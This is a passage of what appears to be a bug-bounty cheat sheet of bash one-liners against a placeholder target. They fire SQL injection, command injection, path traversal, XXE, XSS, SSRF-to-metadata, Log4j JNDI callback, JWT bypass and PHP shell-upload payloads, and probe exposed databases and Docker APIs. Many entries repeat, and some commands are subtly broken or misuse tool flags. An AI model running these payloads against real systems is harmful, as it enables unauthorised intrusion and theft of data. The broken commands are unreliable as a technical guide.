-path-list \u003c(echo -e '/backup.jpg\\n/screenshot.png\\n/db-dump.png\\n/log.png') -mc 200 -o exposed_images.txt\n```\n\n### BONUS — Full Recon Workflow One-Liner\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect | nuclei -silent -t vulnerabilities/ -o all_findings.txt\n```\n\n### Log4j Vulnerability Scanner (JNDI Injection)\n```bash\ncat all_urls.txt | qsreplace '${jndi:ldap://your-collab-url.burpcollaborator.net/a}' | httpx -silent -o log4j_candidates.txt\n```\n\n### AWS S3 Bucket Takeover (Misconfigured Buckets)\n```bash\nsubfinder -d target.com | sed 's/$/.s3.amazonaws.com/' | httpx -silent -mc 200 -o open_buckets.txt\n```\n\n### JWT Secrets Brute Force (Weak Signing Key)\n```bash\ncat jwt_tokens.txt | jwt-cracker -w wordlist.txt -t 50 -o weak_jwt_keys.txt\n```\n\n### CORS Misconfiguration Finder\n```bash\ncat all_urls.txt | httpx -silent -H 'Origin: https://evil.com' -hdrs | grep -E \"Access-Control-Allow-Origin: \\*|Access-Control-Allow-Origin: https://evil.com\" | tee cors_vulns.txt\n```\n\n### GCP Bucket Enumeration (Google Cloud)\n```bash\nsubfinder -d target.com | sed 's/$/.storage.googleapis.com/' | httpx -silent -mc 200 -o open_gcp_buckets.txt\n```\n\n### Python Pickle Injection Check (Deserialization Bug)\n```bash\ncat all_urls.txt | gf deserialize | qsreplace 'evil_pickle_payload_here' | httpx -silent -o pickle_vulns.txt\n```\n\n### SQL Injection (Error-Based Detection)\n```bash\ncat all_urls.txt | gf sqli | qsreplace \"' OR 1=1 --\" | httpx -silent -fr 'syntax|sql|error|database' -o sql_injection.txt\n```\n\n### Version Disclosure Detection\n```bash\ncat all_urls.txt | httpx -silent -hdrs | grep -Ei 'server:|x-powered-by:' | tee version_disclosures.txt\n```\n\n### CRLF Injection with Cookie Injection Check\n```bash\ncat all_urls.txt | gf crlf | qsreplace '%0d%0aSet-Cookie:+crlf=found' | httpx -silent -fr 'crlf=found' -o crlf_cookie_injection.txt\n```\n\n### Directory Traversal Finder\n```bash\ncat all_urls.txt | qsreplace 
'../../etc/passwd' | httpx -silent -fr 'root:x' -o dir_traversal.txt\n```\n\n### Azure Storage Enumeration\n```bash\nsubfinder -d target.com | sed 's/$/.blob.core.windows.net/' | httpx -silent -mc 200 -o open_azure_blobs.txt\n```\n\n### Subdomain Takeover Detection (CNAME Pointing to Unclaimed Services)\n```bash\nsubfinder -d target.com | dnsx -silent -a -resp-only | nuclei -silent -t takeover-detection/ -o takeover_candidates.txt\n```\n\n### Unauthorized Admin Panel Access\n```bash\ncat all_urls.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/dashboard\\n/cms\\n/panel\\n/root\\n/console') -mc 200 -o exposed_admins.txt\n```\n\n### IPv6 Asset Discovery (Many Orgs Forget This)\n```bash\nsubfinder -d target.com | dnsx -silent -aaaa -resp-only | tee ipv6_assets.txt\n```\n\n### Template Injection Finder (SSTI)\n```bash\ncat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_vulns.txt\n```\n\n### Open Redirect Detection\n```bash\ncat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'Location: https://evil.com' -o open_redirects.txt\n```\n\n### Server-Side Request Forgery (SSRF)\n```bash\ncat all_urls.txt | gf ssrf | qsreplace 'http://your-burpcollab-url.burpcollaborator.net' | httpx -silent -o ssrf_candidates.txt\n```\n\n### Exposed .git Repositories (Code Leakage)\n```bash\ncat subdomains.txt | httpx -silent -path '/.git/config' -mc 200 -o exposed_git_repos.txt\n```\n\n### Command Injection Finder\n```bash\ncat all_urls.txt | gf cmd-injection | qsreplace '\u0026\u0026 id' | httpx -silent -fr 'uid=' -o cmd_injection.txt\n```\n\n### Prototype Pollution Detection\n```bash\ncat all_urls.txt | qsreplace '__proto__[exploit]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt\n```\n\n### Email/PII Leakage in Responses\n```bash\ncat all_urls.txt | httpx -silent -fr '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}' -o leaked_emails.txt\n```\n\n### Host Header Injection\n```bash\ncat all_urls.txt | 
httpx -silent -H 'Host: attacker.com' -fr 'attacker.com' -o host_header_injection.txt\n```\n\n### Path Traversal (Windows)\n```bash\ncat all_urls.txt | qsreplace 'C:/Windows/win.ini' | httpx -silent -fr 'for 16-bit app support' -o windows_traversal.txt\n```\n\n### Sensitive Files (Backup Files Exposure)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/.env\\n/config.php.bak\\n/database.yml\\n/backup.zip') -mc 200 -o sensitive_files.txt\n```\n\n### Exposed Config Panels (CMS, Jenkins, PhpMyAdmin)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/phpmyadmin\\n/jenkins\\n/wp-admin\\n/admin\\n/cpanel') -mc 200 -o exposed_panels.txt\n```\n\n### Hardcoded API Keys in JS Files\n```bash\ncat all_js_urls.txt | xargs -I{} curl -s {} | grep -E 'apiKey|apikey|secret|token|bearer' | tee hardcoded_api_keys.txt\n```\n\n### Spring Boot Actuator Exposed Endpoints\n```bash\ncat subdomains.txt | httpx -silent -path '/actuator/health' -mc 200 -o exposed_actuators.txt\n```\n\n### Gopher SSRF (Redis/SMTP Attack)\n```bash\ncat all_urls.txt | qsreplace 'gopher://127.0.0.1:6379/_COMMAND' | httpx -silent -o gopher_ssrf_candidates.txt\n```\n\n### HTML Injection (Reflected)\n```bash\ncat all_urls.txt | gf xss | qsreplace '\u003ch1\u003ePWNED\u003c/h1\u003e' | httpx -silent -fr '\u003ch1\u003ePWNED\u003c/h1\u003e' -o html_injection.txt\n```\n\n### API Token Misconfiguration (Bearer Token Disclosure)\n```bash\ncat all_urls.txt | httpx -silent -hdrs | grep -i 'authorization: Bearer' | tee bearer_tokens.txt\n```\n\n### WordPress Plugin Vulnerabilities (Outdated Plugins)\n```bash\nnuclei -l subdomains.txt -t cves/wordpress/ -o wp_vulns.txt\n```\n\n### Broken Link Hijacking (Subdomain Takeover via Broken Links)\n```bash\ncat subdomains.txt | gau | grep -E '\\.(js|css|png|jpg|jpeg|gif|svg|woff|ttf|ico)' | httpx -silent -status-code -o broken_links.txt\n```\n\n### CRLF Injection (HTTP Response Splitting)\n```bash\ncat all_urls.txt | qsreplace 
'%0d%0aSet-Cookie:crlftest=crlfpoc' | httpx -silent -fr 'crlftest=crlfpoc' -o crlf_injection.txt\n```\n\n### Cloud Storage Misconfig (AWS S3 Bucket Public Access)\n```bash\ncat subdomains.txt | nuclei -t misconfiguration/ -o s3_buckets.txt\n```\n\n### HTTP Method Fuzzing (Check PUT/DELETE enabled)\n```bash\ncat subdomains.txt | httpx -silent -methods PUT,DELETE -mc 200 -o risky_methods.txt\n```\n\n### GraphQL Misconfig (Introspection Enabled)\n```bash\ncat subdomains.txt | httpx -silent -path '/graphql' -mc 200 -fr 'Introspection Query' -o graphql_introspection.txt\n```\n\n### DNS Zone Transfer (AXFR Check)\n```bash\nfor domain in $(cat subdomains.txt); do dig axfr $domain @ns1.$domain; done\n```\n\n### CSP Bypass/Weak CSP Check\n```bash\ncat subdomains.txt | nuclei -t security-misconfiguration/csp-missing.yaml -o weak_csp.txt\n```\n\n### Backup Files (Git, SQL Dumps, Zip Archives)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.sql\\n/.git/config\\n/backup.zip') -mc 200 -o backup_leaks.txt\n```\n\n### Session Fixation (Check if sessionID can be set)\n```bash\ncat all_urls.txt | qsreplace 'sessionid=abc123' | httpx -silent -fr 'sessionid=abc123' -o session_fixation.txt\n```\n\n### JWT Secret Bruteforce (Weak Signing Keys)\n```bash\ncat subdomains.txt | jwt_tool -I -bruteforce wordlist.txt -o weak_jwt_keys.txt\n```\n\n### Exposed Email Addresses in Webpages\n```bash\ncat all_urls.txt | httpx -silent -fr '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}' -o leaked_emails.txt\n```\n\n\n### XML External Entity Injection (XXE)\n```bash\ncat all_urls.txt | gf xxe | qsreplace '\u003c?xml version=\"1.0\"?\u003e\u003c!DOCTYPE data [\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cdata\u003e\u0026xxe;\u003c/data\u003e' | httpx -silent -fr 'root:x' -o xxe_poc.txt\n```\n\n### Exposed Directory Listings (Misconfig)\n```bash\ncat subdomains.txt | httpx -silent -path '/' -fr 'Index of' -o open_dirs.txt\n```\n\n### Kubernetes 
Dashboard Exposure\n```bash\ncat subdomains.txt | httpx -silent -path '/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/' -mc 200 -o exposed_k8s_dashboard.txt\n```\n\n### Exposed Swagger API (Public API Docs)\n```bash\ncat subdomains.txt | httpx -silent -path '/swagger-ui.html' -mc 200 -o exposed_swagger.txt\n```\n\n### Open Redirect Detection\n```bash\ncat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt\n```\n\n### Directory Traversal (../ Exploit)\n```bash\ncat all_urls.txt | gf lfi | qsreplace '../etc/passwd' | httpx -silent -fr 'root:x' -o directory_traversal.txt\n```\n\n### Server-Side Template Injection (SSTI)\n```bash\ncat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_found.txt\n```\n\n### Insecure Cross-Origin Resource Sharing (CORS)\n```bash\ncat subdomains.txt | httpx -silent -H \"Origin: https://evil.com\" -fr 'https://evil.com' -o weak_cors.txt\n```\n\n### SQL Injection - Quick Payload Fire\n```bash\ncat all_urls.txt | gf sqli | qsreplace \"' OR '1'='1\" | httpx -silent -fr 'error' -o sqli_poc.txt\n```\n\n### Backup Config Files (env/config.php)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/.env\\n/config.php\\n/settings.py\\n/config.json') -mc 200 -o leaked_configs.txt\n```\n\n### SSRF (Server-Side Request Forgery)\n```bash\ncat all_urls.txt | gf ssrf | qsreplace 'http://burpcollaborator.net' | httpx -silent -o ssrf_candidates.txt\n```\n\n### File Upload (Potential Upload Endpoints)\n```bash\ncat all_urls.txt | gf upload | httpx -silent -mc 200 -o upload_endpoints.txt\n```\n\n### Sensitive Data Exposure (Credit Card, API Keys)\n```bash\ncat all_urls.txt | httpx -silent -fr 'sk_live|pk_live|eyJhbGci|-----BEGIN PRIVATE KEY-----|4[0-9]{12}(?:[0-9]{3})?' 
-o sensitive_data.txt\n```\n\n### JWT Token Leak (in URL or Response)\n```bash\ncat all_urls.txt | httpx -silent -fr 'eyJ' -o jwt_leaks.txt\n```\n\n### Exposed Database Panels (phpMyAdmin, Mongo, etc)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/phpmyadmin/\\n/admin/\\n/mongo-express/') -mc 200 -o exposed_db_panels.txt\n```\n\n### GIT Repo Exposure\n```bash\ncat subdomains.txt | httpx -silent -path '/.git/config' -mc 200 -o exposed_git.txt\n```\n\n### Debug Pages (dev.php/test.php)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/test.php\\n/dev.php\\n/debug.php') -mc 200 -o debug_pages.txt\n```\n\n### Exposed API Keys in JavaScript Files\n```bash\ncat subdomains.txt | gau | grep '\\.js$' | httpx -silent -fr 'AIza|sk_live|ghp_' -o api_key_leaks.txt\n```\n\n### Unsafe File Upload (PHP Reverse Shell Upload)\n```bash\ncat upload_endpoints.txt | qsreplace 'file=shell.php' | httpx -silent -mc 200 -o shell_upload.txt\n```\n\n### Clickjacking (Missing X-Frame-Options)\n```bash\ncat subdomains.txt | httpx -silent -header 'X-Frame-Options' -o missing_xfo.txt\n```\n\n### HTTP Parameter Pollution (Duplicate Params)\n```bash\ncat all_urls.txt | qsreplace 'param1=value1\u0026param1=value2' | httpx -silent -mc 200 -o hpp_candidates.txt\n```\n\n### Server Info Disclosure (Version Leaks)\n```bash\ncat subdomains.txt | httpx -silent -sc -title -o server_versions.txt\n```\n\n### Password Reset Token Leak in URL\n```bash\ncat all_urls.txt | grep -i 'reset' | grep -E 'token=|key=' | httpx -silent -o reset_token_leak.txt\n```\n\n### Host Header Injection\n```bash\ncat subdomains.txt | httpx -silent -H \"Host: attacker.com\" -fr \"attacker.com\" -o host_header_injection.txt\n```\n\n### Web Cache Poisoning\n```bash\ncat all_urls.txt | qsreplace 'X-Original-URL: /evil' | httpx -silent -fr 'evil' -o cache_poisoning.txt\n```\n\n### AWS Bucket Takeover (S3)\n```bash\ncat subdomains.txt | awk -F. 
'{print $1\".\"$2}' | while read domain; do aws s3 ls s3://$domain --no-sign-request; done\n```\n\n### Exposed Secret Tokens in Robots.txt\n```bash\ncat subdomains.txt | httpx -silent -path /robots.txt -fr 'token|key|secret' -o secret_leak_robots.txt\n```\n\n### Email Injection in Contact Forms\n```bash\ncat contact_forms_urls.txt | qsreplace 'email=attacker%0A%0DCC%3Aevil@attacker.com' | httpx -silent -mc 200 -o email_injection.txt\n```\n\n### PHP Info Disclosure (info.php)\n```bash\ncat subdomains.txt | httpx -silent -path /info.php -mc 200 -o phpinfo_exposed.txt\n```\n\n### Debug Endpoints Exposure (Spring Boot Actuator)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/actuator/health\\n/actuator/env\\n/actuator/mappings') -mc 200 -o exposed_actuator.txt\n```\n\n### Directory Listing Enabled\n```bash\ncat subdomains.txt | httpx -silent -path '/' -fr 'Index of' -o directory_listing.txt\n```\n\n### Kubernetes Dashboard Exposure\n```bash\ncat subdomains.txt | httpx -silent -path '/#/login' -mc 200 -o kube_dashboard_exposed.txt\n```\n\n### Log File Exposure (access.log, error.log)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/access.log\\n/error.log') -mc 200 -o exposed_logs.txt\n```\n\n### Backup Files in Root (zip, tar, sql)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/db.sql\\n/site.tar.gz') -mc 200 -o backup_files.txt\n```\n\n### Insecure Direct Object Reference (IDOR)\n```bash\ncat idor_urls.txt | qsreplace 'user_id=123' | httpx -silent -mc 200 -o idor_candidates.txt\n```\n\n### CSP Bypass (Missing or Weak CSP)\n```bash\ncat subdomains.txt | httpx -silent -H 'Content-Security-Policy' -o weak_csp.txt\n```\n\n### Open API Endpoints Discovery\n```bash\ncat subdomains.txt | httpx -silent -path /swagger.json -mc 200 -o swagger_exposed.txt\n```\n\n### OAuth Token Leak in URLs\n```bash\ncat all_urls.txt | grep -i 'access_token=' | tee oauth_token_leaks.txt\n```\n\n### GraphQL 
Endpoint Discovery\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -mc 200 -o graphql_found.txt\n```\n\n### Prototype Pollution via Params\n```bash\ncat all_urls.txt | qsreplace '__proto__[test]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt\n```\n\n### WordPress XML-RPC Abuse\n```bash\ncat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o xmlrpc_found.txt\n```\n\n🔐  JWT None Algorithm Bypass Check  \n```bash\ncat all_urls.txt | qsreplace 'token=eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -mc 200 -o jwt_none_bypass.txt\n```\n\n🚀  Session Fixation via Set-Cookie  \n```bash\ncat subdomains.txt | httpx -silent -H \"Cookie: sessionid=attacker-session\" -o session_fixation.txt\n```\n\n🛜  Open Redirects  \n```bash\ncat urls.txt | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt\n```\n\n🗂️  Exposed .git Folder  \n```bash\ncat subdomains.txt | httpx -silent -path /.git/HEAD -mc 200 -o git_exposed.txt\n```\n\n🌍  Exposed .env Files (Secrets Leak)  \n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o env_leaks.txt\n```\n\n🧬  GraphQL Introspection Enabled  \n```bash\ncat subdomains.txt | httpx -silent -path /graphql -x POST -body '{\"query\":\"query IntrospectionQuery { __schema { types { name } } }\"}' -fr 'data' -o graphql_introspection.txt\n```\n\nInsecure CORS (Wildcard or Null)  \n```bash\ncat subdomains.txt | httpx -silent -H \"Origin: https://evil.com\" -fr \"https://evil.com\" -o insecure_cors.txt\n```\n\n📂  Backup Files Discovery (.zip, .sql, etc)  \n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/db.sql\\n/site_backup.tar.gz') -mc 200 -o backup_files.txt\n```\n\n📊  Admin Panels Discovery  \n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/dashboard\\n/panel\\n/cp') -mc 200 -o admin_panels.txt\n```\n\n💀  Server Side Template Injection (SSTI)  \n```bash\ncat all_urls.txt | qsreplace '{{7*7}}' 
| httpx -silent -fr '49' -o ssti.txt\n```\n\n📋  Path Traversal (../ Disclosure)  \n```bash\ncat all_urls.txt | qsreplace '../../../../etc/passwd' | httpx -silent -fr 'root:x' -o path_traversal.txt\n```\n\n🐍  Python Pickle Injection (if Flask or Python backend)  \n```bash\ncat all_urls.txt | qsreplace '__class__=os.system\u0026cmd=id' | httpx -silent -fr 'uid=' -o pickle_injection.txt\n```\n\nCRLF Injection (Header Splitting)  \n```bash\ncat all_urls.txt | qsreplace '%0d%0aHeader: evil' | httpx -silent -fr 'Header: evil' -o crlf.txt\n```\n\n💾  Exposed Database Admin Panels  \n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/phpmyadmin\\n/adminer\\n/sql') -mc 200 -o db_admin_panels.txt\n```\n\n🧱  File Upload Misconfig (Can upload PHP/JSP)  \n```bash\ncat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.php' {} -s -o - | grep 'shell_exec' -B 2\n```\n\n🕵️‍♂️  Cloud Metadata API Exposure (AWS/GCP)  \n```bash\ncat subdomains.txt | httpx -silent -path /latest/meta-data/ -mc 200 -o metadata_exposed.txt\n```\n\n💣  CRLF in Redirect Location Header  \n```bash\ncat urls.txt | qsreplace '%0d%0aLocation:%20https://evil.com' | httpx -silent -fr 'evil.com' -o crlf_redirect.txt\n```\n\n📑  XSS in JSON Response (Reflected)  \n```bash\ncat urls.txt | qsreplace '\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e' | httpx -silent -fr 'alert(1)' -o xss.json.txt\n```\n\n🔌  Exposed Internal IPs (Debug Responses)  \n```bash\ncat urls.txt | httpx -silent -fr '10\\.|172\\.|192\\.168\\.' 
-o internal_ips.txt\n```\n\n🌐  Misconfigured WAF Bypass  \n```bash\ncat urls.txt | qsreplace '\u003e\u003cscript\u003ealert(1)\u003c/script\u003e' | httpx -silent -mc 403 -o waf_detected.txt\ncat waf_detected.txt | qsreplace '\u003e\u003cscript\u003ealert(1)\u003c/script\u003e' | anew bypass_payloads.txt\ncat bypass_payloads.txt | httpx -silent -mc 200 -o waf_bypass.txt\n```\n\n📤  Information Disclosure via Verb Tampering  \n```bash\ncat subdomains.txt | httpx -silent -method OPTIONS -o verb_tampering.txt\n```\n\n🧰 **S3 Bucket Discovery via Subdomain Bruteforce**  \n```bash\ncat subdomains.txt | awk -F. '{print $1\".\"$2}' | xargs -I {} aws s3 ls s3://{} --no-sign-request 2\u003e/dev/null | tee s3_buckets.txt\n```\n\n💧 **AWS S3 Bucket Takeover (Subdomain Takeover)**  \n```bash\ncat subdomains.txt | xargs -I {} host {} | grep 'amazonaws.com' | awk '{print $1}' | httpx -silent -mc 404 -o vulnerable_s3.txt\n```\n\n📜 **Exposed Swagger/OpenAPI Endpoints**  \n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/swagger.json\\n/openapi.json\\n/api-docs') -mc 200 -o openapi_endpoints.txt\n```\n\n**Prototype Pollution in Query Params**  \n```bash\ncat urls.txt | qsreplace '__proto__[evil]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt\n```\n\n💉 **SQL Injection (Basic Reflex Check)**  \n```bash\ncat urls.txt | qsreplace \"'\" | httpx -silent -fr 'SQL syntax' -o sqli.txt\n```\n\n🔗 **SSRF (Internal IP Scan via Open Redirect or URL Input)**  \n```bash\ncat urls.txt | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id' -o ssrf_aws_metadata.txt\n```\n\n🔥 **Spring Boot Actuator Exposure (DevOps Misconfig)**  \n```bash\ncat subdomains.txt | httpx -silent -path /actuator/env -mc 200 -o springboot_actuator_exposed.txt\n```\n\n**JWT None Algorithm Bypass**  \n```bash\ncat urls.txt | qsreplace 'eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' 
| httpx -silent -fr 'admin' -o jwt_none_bypass.txt\n```\n\n**Firebase Misconfig (Open Firebase Databases)**  \n```bash\ncat subdomains.txt | sed 's/$/.firebaseio.com/' | httpx -silent -path /.json -mc 200 -o open_firebase.txt\n```\n\n📡 **GraphQL Playground/Console Discovery**  \n```bash\ncat subdomains.txt | httpx -silent -path /graphiql -mc 200 -o graphql_console.txt\n```\n\n⚠️ **SOAP Service Discovery (Old APIs)**  \n```bash\ncat subdomains.txt | httpx -silent -path /services.wsdl -mc 200 -o soap_services.txt\n```\n\n📬 **Email Injection via Contact Forms**  \n```bash\ncat urls.txt | qsreplace 'test%0d%0aBCC:evil@attacker.com' | httpx -silent -fr 'evil@attacker.com' -o email_injection.txt\n```\n\n🕵️‍♂️ **GCP Bucket Enumeration (Public Buckets)**  \n```bash\ncat subdomains.txt | sed 's/$/.storage.googleapis.com/' | httpx -silent -mc 200 -o gcp_buckets.txt\n```\n\n🛠️ **Deserialization via File Upload (PHP/JAVA Specific)**  \n```bash\ncat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.ser' {} -s -o - | grep 'java.lang' -B 2\n```\n\n🔗 **IDOR Detection via Incremental IDs**  \n```bash\ncat urls.txt | qsreplace 'id=123' | anew incremental_ids.txt\ncat incremental_ids.txt | qsreplace 'id=124' | httpx -silent -fr 'profile' -o idor_found.txt\n```\n\n**Azure Blob Storage Enumeration**  \n```bash\ncat subdomains.txt | sed 's/$/.blob.core.windows.net/' | httpx -silent -mc 200 -o azure_blobs.txt\n```\n\n🎯 **XXE Injection via File Upload (XML Files)**  \n```bash\ncat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.xml' {} -s -o - | grep 'root:' -B 2\n```\n\n📊 **Exposed Kibana Dashboards (DevOps)**  \n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o exposed_kibana.txt\n```\n\n**CVE Scanner for Web Targets (Nuclei One-Liner)**  \n```bash\ncat subdomains.txt | nuclei -silent -t cves/ -o found_cves.txt\n```\n\n📈 **LFI via Log Poisoning**  \n```bash\ncat urls.txt | qsreplace 
'../../../../../../../../var/log/nginx/access.log' | httpx -silent -fr 'GET /' -o log_poisoning_lfi.txt\n```\n\n🗄️ **Exposed Jenkins Console (DevOps)**  \n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o exposed_jenkins.txt\n```\n\n📂  Exposed Git Directories (Sensitive Files in .git)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git.txt\n```\n\n🔥  Open Kibana (Cloud Misconfiguration)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt\n```\n\n📤  Exposed Env Files (Secrets Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env.txt\n```\n\n🗂️  Directory Listing Enabled (Info Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path / -fr 'Index of /' -o dir_listing.txt\n```\n\n💉  Command Injection via Input Parameters\n```bash\ncat urls.txt | qsreplace '$(id)' | httpx -silent -fr 'uid=' -o command_injection.txt\n```\n\n🪄  CORS Misconfiguration Check (Origin Reflection)\n```bash\ncat urls.txt | httpx -silent -H 'Origin: https://evil.com' -fr 'https://evil.com' -o cors_misconfig.txt\n```\n\n🔗  Open Redirect (URL Parameter Test)\n```bash\ncat urls.txt | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirect.txt\n```\n\nBackup/Old Files Exposure\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/index.php~\\n/config.old\\n/database.bak') -mc 200 -o exposed_backup_files.txt\n```\n\n🕵️  Clickjacking (Missing X-Frame-Options)\n```bash\ncat subdomains.txt | httpx -silent -hx -o headers.txt\ncat headers.txt | grep -E \"x-frame-options|X-Frame-Options\" -i -L \u003e clickjacking_vulnerable.txt\n```\n\n⚙️  Misconfigured Jenkins Instances\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o exposed_jenkins.txt\n```\n\n💾  Open MongoDB Instances (Cloud Exposure)\n```bash\ncat ips.txt | xargs -I{} sh -c 'echo {} \u0026\u0026 mongosh --host {} --eval \"db.stats()\"' 2\u003e/dev/null | tee 
open_mongodb.txt\n```\n\nExposed Private Keys (Accidental Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/id_rsa\\n/keys/privkey.pem\\n/.ssh/id_rsa') -mc 200 -o exposed_keys.txt\n```\n\nInsecure JSONP Endpoints (Callback Hijacking)\n```bash\ncat urls.txt | qsreplace 'callback=alert(document.domain)' | httpx -silent -fr 'alert(document.domain)' -o jsonp_vulns.txt\n```\n\nExposed phpinfo() Files (Info Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o exposed_phpinfo.txt\n```\n\nRCE via Deserialization (Java/PHP Payloads)\n```bash\ncat upload_urls.txt | xargs -I{} curl -X POST -F 'file=@payload.ser' {} -s | grep 'java.lang.Runtime' -o rce_found.txt\n```\n\nLFI via Log Files\n```bash\ncat urls.txt | qsreplace '../../../../../../../../var/log/nginx/access.log' | httpx -silent -fr 'GET /' -o log_lfi.txt\n```\n\nExposed Docker APIs (DevOps Misconfig)\n```bash\ncat ips.txt | xargs -I{} curl -s -X GET \"http://{}:2375/images/json\" | grep 'Id' -B 2 | tee exposed_docker.txt\n```\n\nAmazon S3 Buckets (Open Buckets)\n```bash\ncat subdomains.txt | sed 's/$/.s3.amazonaws.com/' | httpx -silent -mc 200 -o open_s3_buckets.txt\n```\n\nOpen Elasticsearch (DevOps Exposure)\n```bash\ncat ips.txt | xargs -I{} curl -s \"http://{}:9200/_cat/indices?v\" | grep -v 'master' | tee open_elasticsearch.txt\n```\n\nBackup Files in Web Root\n```bash\ncat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 -o found_backups.txt\n```\n\nXSS in reflected parameters (quick check)\n```bash\ncat urls.txt | qsreplace '\u003cscript\u003ealert(1)\u003c/script\u003e' | httpx -silent -fr '\u003cscript\u003ealert(1)\u003c/script\u003e' -o xss_reflected.txt\n```\n\nSQL Injection (time-based detection)\n```bash\ncat urls.txt | qsreplace \"' AND SLEEP(5)--\" | httpx -silent -rt -o sqli_time_based.txt\n```\n\nDetect exposed Git repositories (.git folder)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/HEAD -mc 200 -o 
exposed_git_repos.txt\n```\n\nFind Local File Inclusion (LFI)\n```bash\ncat urls.txt | qsreplace '../../../../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o lfi_found.txt\n```\n\nOpen Directory Listing\n```bash\ncat subdomains.txt | httpx -silent -mc 200 -fr 'Index of' -o open_directory_listing.txt\n```\n\nFind Open Kibana Dashboards (Internal Leaks)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt\n```\n\nSubdomain Takeover (Check NXDOMAIN)\n```bash\nsubfinder -d target.com | httpx -silent -sc -o subs_status.txt\ncat subs_status.txt | grep 'NXDOMAIN' \u003e takeover_candidates.txt\n```\n\nTest for Host Header Injection\n```bash\ncat urls.txt | httpx -silent -H \"Host: evil.com\" -fr 'evil.com' -o host_header_injection.txt\n```\n\nExposed Config Files\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/config.php\\n/settings.py\\n/.env\\n/config.json') -mc 200 -o exposed_configs.txt\n```\n\nDetecting Exposed Admin Panels\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/wp-admin\\n/console\\n/dashboard') -mc 200 -o admin_panels.txt\n```\n\nCommand Injection Test\n```bash\ncat urls.txt | qsreplace '$(id)' | httpx -silent -fr 'uid=' -o command_injection.txt\n```\n\nCheck for Backup Files (Old Configs)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/db_backup.sql\\n/config.old') -mc 200 -o backup_files_found.txt\n```\n\nCheck for Open Redis Instances\n```bash\ncat subdomains.txt | httpx -silent -path / -p 6379 -o open_redis_instances.txt\n```\n\nTest for Open Proxy Misconfiguration\n```bash\ncurl -x http://target.com http://example.com -v\n```\n\nXXE Injection Test\n```bash\ncat urls.txt | qsreplace '\u003c?xml version=\"1.0\"?\u003e\u003c!DOCTYPE foo [\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xxe;\u003c/foo\u003e' | httpx -silent -fr 'root:x:' -o xxe_found.txt\n```\n\nDetect JWT Tokens in 
